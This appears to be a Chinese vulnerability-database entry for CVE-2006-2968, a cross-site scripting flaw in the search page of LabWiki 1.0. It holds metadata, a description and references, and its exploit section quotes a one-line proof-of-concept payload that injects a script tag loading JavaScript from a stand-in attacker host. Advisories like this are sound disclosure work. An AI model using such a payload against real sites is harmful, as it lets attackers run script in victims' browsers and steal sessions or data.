PHP Labware LabWiki Search.PHP 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194586 漏洞类型 跨站脚本
发布时间 2006-06-12 更新时间 2006-06-13
CVE编号 CVE-2006-2968 CNNVD-ID CNNVD-200606-250
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006060097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-250
|漏洞详情
PHPLabwareLabWiki1.0中search.php存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助搜索输入框(查询参数)注入任意的Web脚本或HTML。
|漏洞EXP
LabWiki 1.0

Homepage:

http://www.bioinformatics.org/phplabware/labwiki/index.php

Effected files:

search.php

The search input box does not sanatize user input before dynamically genrating it.

XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"
|参考资料

来源:BID
名称:18288
链接:http://www.securityfocus.com/bid/18288
来源:BUGTRAQ
名称:20060605LabWikiv1.0
链接:http://www.securityfocus.com/archive/1/archive/1/435981/100/0/threaded
来源:VIM
名称:20060612verifyofLabWikiissue(sourceinspection)
链接:http://www.attrition.org/pipermail/vim/2006-June/000845.html
来源:SECTRACK
名称:1016227
链接:http://securitytracker.com/id?1016227
来源:XF
名称:labwiki-search-xss(26988)
链接:http://xforce.iss.net/xforce/xfdb/26988
来源:OSVDB
名称:26597
链接:http://www.osvdb.org/26597
来源:SREASON
名称:1092
链接:http://securityreason.com/securityalert/1092